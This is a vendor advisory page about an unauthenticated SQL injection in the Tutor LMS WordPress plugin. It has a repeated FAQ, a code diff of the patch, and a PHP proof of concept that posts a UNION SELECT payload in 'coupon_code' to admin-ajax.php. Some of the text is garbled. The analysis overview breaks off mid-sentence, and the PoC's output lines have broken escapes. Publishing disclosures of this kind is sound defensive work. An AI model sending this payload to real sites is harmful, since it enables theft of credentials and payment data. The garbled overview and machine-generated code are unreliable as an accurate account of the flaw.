What is CVE-2025-13673?

CVE-2025-13673 is a high-severity SQL injection vulnerability found in Tutor LMS versions up to and including 3.9.6. It allows unauthenticated attackers to execute arbitrary SQL queries through the ‘coupon_code’ parameter, potentially leading to sensitive data exposure.

How does the SQL injection work?

The vulnerability arises from insufficient escaping of user-supplied input in the SQL query related to coupon codes. Attackers can manipulate the ‘coupon_code’ parameter to inject additional SQL commands, which can be executed by the database.

Who is affected by this vulnerability?

Any WordPress site using Tutor LMS versions 3.9.6 or earlier is at risk. Administrators can check their installed version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of Tutor LMS installed. If it is version 3.9.6 or earlier, your site is susceptible to CVE-2025-13673. Additionally, testing with the proof of concept can confirm vulnerability.

What steps should I take to mitigate this vulnerability?

The most effective way to mitigate CVE-2025-13673 is to update Tutor LMS to version 3.9.7 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is crucial for maintaining security.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to the confidentiality and integrity of the system. It suggests that exploitation could lead to serious consequences, including unauthorized access to sensitive data.

What is the practical risk of this vulnerability?

The practical risk includes the potential for attackers to extract sensitive information such as user credentials, payment details, and course content from the database. This can lead to data breaches and loss of user trust.

How was the vulnerability partially mitigated in earlier versions?

In versions 3.9.4 and 3.9.6, some measures were taken to reduce the risk of exploitation, but these were insufficient to fully secure the application. The complete fix was implemented in version 3.9.7.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can use a crafted SQL injection payload to extract the database version. It shows the ease with which an unauthenticated user can exploit the vulnerability, highlighting the need for immediate action.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Tutor LMS plugin until a secure version can be installed. Additionally, review server logs for any suspicious activity and limit access to sensitive areas of the site.

Are there any known exploits in the wild?

As of the vulnerability disclosure date, there are no confirmed reports of active exploitation in the wild. However, given the severity and ease of exploitation, it is advisable to take preventive measures immediately.

Where can I find more information about this vulnerability?

More information about CVE-2025-13673 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security forums. Keeping abreast of updates from the Tutor LMS development team is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13673: Tutor LMS <= 3.9.6 – Unauthenticated SQL Injection via coupon_code (tutor)

CVE ID CVE-2025-13673

Plugin tutor

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 3.9.6

Patched Version 3.9.7

Disclosed February 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13673:

The vulnerability is an unauthenticated SQL injection in Tutor LMS versions prepare()` with appropriate format specifiers for integers, floats, and strings. This ensures proper parameterized query construction.

Atomic Edge research confirms the vulnerability allows complete database compromise. Attackers can extract sensitive information including user credentials, payment details, and course content. The CVSS 7.5 score reflects high impact due to unauthenticated access and complete confidentiality loss.

Differential between vulnerable and patched code

Code Diff

--- a/tutor/classes/User.php
+++ b/tutor/classes/User.php
@@ -246,7 +246,11 @@
 		$meta_key = 'cover_photo' == $type ? '_tutor_cover_photo' : '_tutor_profile_photo';
 		$photo_id = get_user_meta( $user_id, $meta_key, true );
 		if ( is_numeric( $photo_id ) ) {
-			wp_delete_attachment( $photo_id, true );
+			$attachment  = get_post( $photo_id );
+			$post_author = (int) $attachment->post_author ?? 0;
+			if ( $user_id === $post_author ) {
+				wp_delete_attachment( $photo_id, true );
+			}
 		}
 		delete_user_meta( $user_id, $meta_key );
 	}
@@ -375,15 +379,6 @@
 		$_tutor_profile_bio       = Input::post( self::PROFILE_BIO_META, '', Input::TYPE_KSES_POST );
 		$_tutor_profile_image     = Input::post( self::PROFILE_PHOTO_META, '', Input::TYPE_KSES_POST );

-		// Check if the image uploaded is by the same user.
-		if ( is_numeric( $_tutor_profile_image ) ) {
-			$attachment = get_post( $_tutor_profile_image );
-			$author_id  = (int) $attachment->post_author ?? 0;
-			if ( 'attachment' === $attachment->post_type && $user_id !== $author_id ) {
-				return;
-			}
-		}
-
 		update_user_meta( $user_id, self::PROFILE_JOB_TITLE_META, $_tutor_profile_job_title );
 		update_user_meta( $user_id, self::PROFILE_BIO_META, $_tutor_profile_bio );
 		update_user_meta( $user_id, self::PROFILE_PHOTO_META, $_tutor_profile_image );
--- a/tutor/ecommerce/HooksHandler.php
+++ b/tutor/ecommerce/HooksHandler.php
@@ -189,7 +189,15 @@
 		$transaction_id     = $res->transaction_id;

 		$order_details = $this->order_model->get_order_by_id( $order_id );
-		if ( $order_details ) {
+
+		/**
+		 * Ignore canceled/failed webhooks for old/failed payment session to avoid unenrolling paid users.
+		 *
+		 * @since 3.9.7
+		 */
+		$is_valid_paid_order = OrderModel::ORDER_COMPLETED === $order_details && OrderModel::PAYMENT_PAID === $order_details->payment_status;
+
+		if ( $order_details && ! $is_valid_paid_order ) {
 			$prev_payment_status = $order_details->payment_status;

 			$order_data = array(
--- a/tutor/helpers/QueryHelper.php
+++ b/tutor/helpers/QueryHelper.php
@@ -252,6 +252,7 @@
 	 * Otherwise the clause would be `WHERE column_name = 'value'`
 	 *
 	 * @since 3.0.0
+	 * @since 3.9.7 added prepared statement for value.
 	 *
 	 * @param array $where  The where clause array. e.g. array( 'id', 'IN', array(1, 2, 3) ) or array( 'id', '=', 1 ).
 	 *
@@ -261,8 +262,16 @@
 		list ( $field, $operator, $value ) = $where;

 		$upper_operator = strtoupper( $operator );
+
 		if ( in_array( $upper_operator, array( 'IN', 'NOT IN' ), true ) ) {
 			$value = '(' . self::prepare_in_clause( $value ) . ')';
+		} elseif ( in_array( $upper_operator, array( 'BETWEEN', 'NOT BETWEEN' ), true ) ) {
+			$value = array_map( fn( $val ) => self::prepare_value( $val ), $value );
+			$value = implode( ' AND ', $value );
+		} elseif ( strtoupper( $value ) === 'NULL' ) {
+			$value = 'NULL';
+		} else {
+			$value = self::prepare_value( $value );
 		}

 		return "{$field} {$upper_operator} {$value}";
@@ -346,15 +355,13 @@
 					case 'BETWEEN':
 					case 'NOT BETWEEN':
 						if ( is_array( $val ) && count( $val ) === 2 ) {
-							$val1   = is_numeric( $val[0] ) ? $val[0] : "'" . $val[0] . "'";
-							$val2   = is_numeric( $val[1] ) ? $val[1] : "'" . $val[1] . "'";
-							$clause = array( $field, $operator, "{$val1} AND {$val2}" );
+							$clause = array( $field, $operator, $val );
 						}
 						break;

 					case 'IS':
 					case 'IS NOT':
-						$val    = strtoupper( $val ) === 'NULL' ? 'NULL' : "'" . $val . "'";
+						$val    = strtoupper( $val ) === 'NULL' ? 'NULL' : $val;
 						$clause = array( $field, $operator, $val );
 						break;
 					case 'RAW':
@@ -365,16 +372,14 @@
 						$clause = $final_query;
 						break;
 					default: // =, !=, <, >, <=, >=, LIKE, NOT LIKE, <>
-						$val    = is_numeric( $val ) ? $val : "'" . $val . "'";
 						$clause = array( $field, $operator, $val );
 						break;
 				}
 			} elseif ( is_array( $value ) ) {
 				$clause = array( $field, 'IN', $value );
 			} elseif ( 'null' === strtolower( $value ) ) {
-					$clause = array( $field, 'IS', 'NULL' );
+				$clause = array( $field, 'IS', 'NULL' );
 			} else {
-				$value  = is_numeric( $value ) ? $value : "'" . $value . "'";
 				$clause = array( $field, '=', $value );
 			}

@@ -911,31 +916,40 @@
 	}

 	/**
+	 * Prepare value before using in query.
+	 *
+	 * @since 3.9.7
+	 *
+	 * @param string|int|float $value the value to prepare.
+	 *
+	 * @return mixed
+	 */
+	public static function prepare_value( $value ) {
+		global $wpdb;
+		$escaped_value = null;
+		if ( is_int( $value ) ) {
+			$escaped_value = $wpdb->prepare( '%d', $value );
+		} elseif ( is_float( $value ) ) {
+			list( $whole, $decimal ) = explode( '.', $value );
+			$expression = '%.'. strlen( $decimal ) . 'f';
+			$escaped_value = $wpdb->prepare( $expression, $value );
+		} else {
+			$escaped_value = $wpdb->prepare( '%s', $value );
+		}
+		return $escaped_value;
+	}
+
+	/**
 	 * Make sanitized SQL IN clause value from an array
 	 *
+	 * @since 2.1.1
+	 *
 	 * @param array $arr a sequential array.
+	 *
 	 * @return string
-	 * @since 2.1.1
 	 */
 	public static function prepare_in_clause( array $arr ) {
-		$escaped = array_map(
-			function( $value ) {
-				global $wpdb;
-				$escaped_value = null;
-				if ( is_int( $value ) ) {
-					$escaped_value = $wpdb->prepare( '%d', $value );
-				} else if( is_float( $value ) ) {
-					list( $whole, $decimal ) = explode( '.', $value );
-					$expression = '%.'. strlen( $decimal ) . 'f';
-					$escaped_value = $wpdb->prepare( $expression, $value );
-				} else {
-					$escaped_value = $wpdb->prepare( '%s', $value );
-				}
-				return $escaped_value;
-			},
-			$arr
-		);
-
+		$escaped = array_map( fn( $value ) => self::prepare_value( $value ), $arr );
 		return implode( ',', $escaped );
 	}

--- a/tutor/includes/droip/backend/ElementGenerator/ThumbnailGenerator.php
+++ b/tutor/includes/droip/backend/ElementGenerator/ThumbnailGenerator.php
@@ -73,7 +73,7 @@
 							'type'   => 'video',
 							'src'    => $video_info->$source_key,
 							'source' => $video_info->source,
-							'poster_url' => $video_info->poster_url
+							'poster_url' => isset($video_info->poster_url) ? $video_info->poster_url: null,
 						);
 					} elseif ( $video_info->source === 'youtube' ) {
 						$youtube_video_id = tutor_utils()->get_youtube_video_id( tutor_utils()->avalue_dot( 'source_youtube', $video_info ) );
--- a/tutor/includes/droip/backend/Hooks.php
+++ b/tutor/includes/droip/backend/Hooks.php
@@ -206,6 +206,19 @@
                     ['title' => 'Content', 'value' => 'TUTOR_LMS-membership-features-feature-content'],
                 ];
             }
+        } else if (isset($collection_data['collectionType']) && $collection_data['collectionType'] === 'user' || $collection_data['collectionType'] === 'users') {
+            if ($collection_data['elementContentType'] === 'anchor') {
+                $fields['typeValuesAttr']['anchor']['author'] = array_merge(
+                    $fields['typeValuesAttr']['anchor']['author'],
+                    [
+                        ['title' => 'Facebook', 'value' => 'TUTOR_LMS-instructor-facebook'],
+                        ['title' => 'X (Twitter)', 'value' => 'TUTOR_LMS-instructor-twitter'],
+                        ['title' => 'Linkedin', 'value' => 'TUTOR_LMS-instructor-linkedin'],
+                        ['title' => 'Website', 'value' => 'TUTOR_LMS-instructor-website'],
+                        ['title' => 'Github', 'value' => 'TUTOR_LMS-instructor-github'],
+                    ]
+                );
+            }
         }

         return $fields;
@@ -758,6 +771,20 @@

                     return $url;
                 }
+            } else if ($dynamicContent['type'] === 'author') {
+                $user_id = isset($args['options'], $args['options']['user']) ? $args['options']['user']['ID'] : false;
+
+                if ($dynamicContent['value'] === 'TUTOR_LMS-instructor-facebook') {
+                    return get_user_meta($user_id, '_tutor_profile_facebook', true);
+                } else if ($dynamicContent['value'] === 'TUTOR_LMS-instructor-twitter') {
+                    return get_user_meta($user_id, '_tutor_profile_twitter', true);
+                } else if ($dynamicContent['value'] === 'TUTOR_LMS-instructor-linkedin') {
+                    return get_user_meta($user_id, '_tutor_profile_linkedin', true);
+                } else if ($dynamicContent['value'] === 'TUTOR_LMS-instructor-website') {
+                    return get_user_meta($user_id, '_tutor_profile_website', true);
+                } else if ($dynamicContent['value'] === 'TUTOR_LMS-instructor-github') {
+                    return get_user_meta($user_id, '_tutor_profile_github', true);
+                }
             }
         } elseif (isset($args['settings'])) {
             $settings = $args['settings'];
--- a/tutor/includes/droip/backend/VisibilityCondition.php
+++ b/tutor/includes/droip/backend/VisibilityCondition.php
@@ -328,6 +328,52 @@
 						'title' 	  => 'Offer sale Price',
 						'operator_type' => 'boolean_operators',
 					),
+
+					// start: trial
+					array(
+						'source' => TDE_APP_PREFIX,
+						'value' => 'trial_value',
+						'title' => 'Length of Trial',
+						'operator_type' => 'numeric_operators',
+						'operand_type' => array_merge(
+							DROIP_PLUGIN_SETTINGS['INPUT_NUMBER'],
+							array(
+								'placeholder' => 'Trial Value',
+							)
+						),
+					),
+
+					array(
+						'source' => TDE_APP_PREFIX,
+						'value' => 'trial_interval',
+						'title' => 'Trial Interval',
+						'operator_type' => 'dropdown_operators',
+						'operand_type' => array_merge(
+							DROIP_PLUGIN_SETTINGS['SELECT'],
+							array(
+								'options' => array(
+									array(
+										'value' => 'day',
+										'title' => 'Day',
+									),
+								),
+							),
+						),
+					),
+
+					array(
+						'source' => TDE_APP_PREFIX,
+						'value' => 'trial_fee',
+						'title' => 'Trial Fee',
+						'operator_type' => 'numeric_operators',
+						'operand_type' => array_merge(
+							DROIP_PLUGIN_SETTINGS['INPUT_NUMBER'],
+							array(
+								'placeholder' => 'Trial Fee',
+							)
+						),
+					),
+					// end: trial
 				),
 			),
 		);
@@ -599,6 +645,35 @@
 						'title'         => 'Certificate Enabled',
 						'operator_type' => 'boolean_operators',
 					),
+					array(
+						'source' => TDE_APP_PREFIX,
+						'value' => 'difficulty_level',
+						'title' => 'Difficulty Level',
+						'operator_type' => 'dropdown_operators',
+						'operand_type' => array_merge(
+							DROIP_PLUGIN_SETTINGS['SELECT'],
+							array(
+								'options' => array(
+									array(
+										'value' => 'all_levels',
+										'title' => 'All Levels',
+									),
+									array(
+										'value' => 'beginner',
+										'title' => 'Beginner',
+									),
+									array(
+										'value' => 'intermediate',
+										'title' => 'Intermediate',
+									),
+									array(
+										'value' => 'expert',
+										'title' => 'Expert',
+									),
+								),
+							)
+						),
+					),
 				)
 			),
 		);
@@ -860,14 +935,27 @@
 		switch ($field) {
 			case 'enrollment_fee':
 			case 'sale_price': {
-					return $membership_plan[$field] !== '0.00';
-				}
+				return $membership_plan[$field] !== '0.00';
+			}

 			case 'is_featured':
 			case 'provide_certificate': {
-					return $membership_plan[$field] == '1';
+				return $membership_plan[$field] == '1';
+			}
+
+			case 'trial_value':
+			case 'trial_fee': {
+				if (isset($membership_plan[$field])) {
+					return floatval($membership_plan[$field]);
 				}

+				return false;
+			}
+
+			case 'trial_interval': {
+				return $membership_plan['trial_interval'] ?? false;
+			}
+
 			default:
 				return isset($membership_plan[$field]) ? $membership_plan[$field] : null;
 		}
@@ -948,6 +1036,10 @@
 					}
 					return false;
 				}
+
+			case 'difficulty_level': {
+				return get_post_meta($course_id, '_tutor_course_level', true);
+			}
 		}
 	}

--- a/tutor/models/CouponModel.php
+++ b/tutor/models/CouponModel.php
@@ -810,7 +810,7 @@
 		} else {
 			$coupon = $this->get_coupon(
 				array(
-					'coupon_code'   => esc_sql( $coupon_code ),
+					'coupon_code'   => $coupon_code,
 					'coupon_status' => self::STATUS_ACTIVE,
 				)
 			);
--- a/tutor/tutor.php
+++ b/tutor/tutor.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://tutorlms.com
  * Description: Tutor is a complete solution for creating a Learning Management System in WordPress way. It can help you to create small to large scale online education site very conveniently. Power features like report, certificate, course preview, private file sharing make Tutor a robust plugin for any educational institutes.
  * Author: Themeum
- * Version: 3.9.6
+ * Version: 3.9.7
  * Author URI: https://themeum.com
  * Requires PHP: 7.4
  * Requires at least: 5.3
@@ -26,7 +26,7 @@
  *
  * @since 1.0.0
  */
-define( 'TUTOR_VERSION', '3.9.6' );
+define( 'TUTOR_VERSION', '3.9.7' );
 define( 'TUTOR_FILE', __FILE__ );

 /**
--- a/tutor/vendor/composer/installed.php
+++ b/tutor/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'themeum/tutor',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
+        'reference' => '379e90b7840e362483da16f96d4d9bb7de1572de',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'themeum/tutor' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
+            'reference' => '379e90b7840e362483da16f96d4d9bb7de1572de',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13673 - Tutor LMS <= 3.9.6 - Unauthenticated SQL Injection via coupon_code

<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// SQL injection payload to extract database version
$payload = "' UNION SELECT @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -";

$post_data = array(
    'action' => 'tutor_get_coupon_data',
    'coupon_code' => $payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: $responsen";

// The vulnerable endpoint processes the coupon_code parameter without proper sanitization
// The UNION SELECT payload attempts to extract the database version
// Successful exploitation returns database information in the response

?>

Frequently Asked Questions

What is CVE-2025-13673?
Overview of the vulnerability
CVE-2025-13673 is a high-severity SQL injection vulnerability found in Tutor LMS versions up to and including 3.9.6. It allows unauthenticated attackers to execute arbitrary SQL queries through the ‘coupon_code’ parameter, potentially leading to sensitive data exposure.
How does the SQL injection work?
Mechanism of the vulnerability
The vulnerability arises from insufficient escaping of user-supplied input in the SQL query related to coupon codes. Attackers can manipulate the ‘coupon_code’ parameter to inject additional SQL commands, which can be executed by the database.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using Tutor LMS versions 3.9.6 or earlier is at risk. Administrators can check their installed version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of Tutor LMS installed. If it is version 3.9.6 or earlier, your site is susceptible to CVE-2025-13673. Additionally, testing with the proof of concept can confirm vulnerability.
What steps should I take to mitigate this vulnerability?
Recommended actions
The most effective way to mitigate CVE-2025-13673 is to update Tutor LMS to version 3.9.7 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is crucial for maintaining security.
What does a CVSS score of 7.5 indicate?
Understanding severity ratings
A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to the confidentiality and integrity of the system. It suggests that exploitation could lead to serious consequences, including unauthorized access to sensitive data.
What is the practical risk of this vulnerability?
Impact on site security
The practical risk includes the potential for attackers to extract sensitive information such as user credentials, payment details, and course content from the database. This can lead to data breaches and loss of user trust.
How was the vulnerability partially mitigated in earlier versions?
Previous attempts to address the issue
In versions 3.9.4 and 3.9.6, some measures were taken to reduce the risk of exploitation, but these were insufficient to fully secure the application. The complete fix was implemented in version 3.9.7.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can use a crafted SQL injection payload to extract the database version. It shows the ease with which an unauthenticated user can exploit the vulnerability, highlighting the need for immediate action.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the Tutor LMS plugin until a secure version can be installed. Additionally, review server logs for any suspicious activity and limit access to sensitive areas of the site.
Are there any known exploits in the wild?
Current threat landscape
As of the vulnerability disclosure date, there are no confirmed reports of active exploitation in the wild. However, given the severity and ease of exploitation, it is advisable to take preventive measures immediately.
Where can I find more information about this vulnerability?
Additional resources
More information about CVE-2025-13673 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security forums. Keeping abreast of updates from the Tutor LMS development team is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations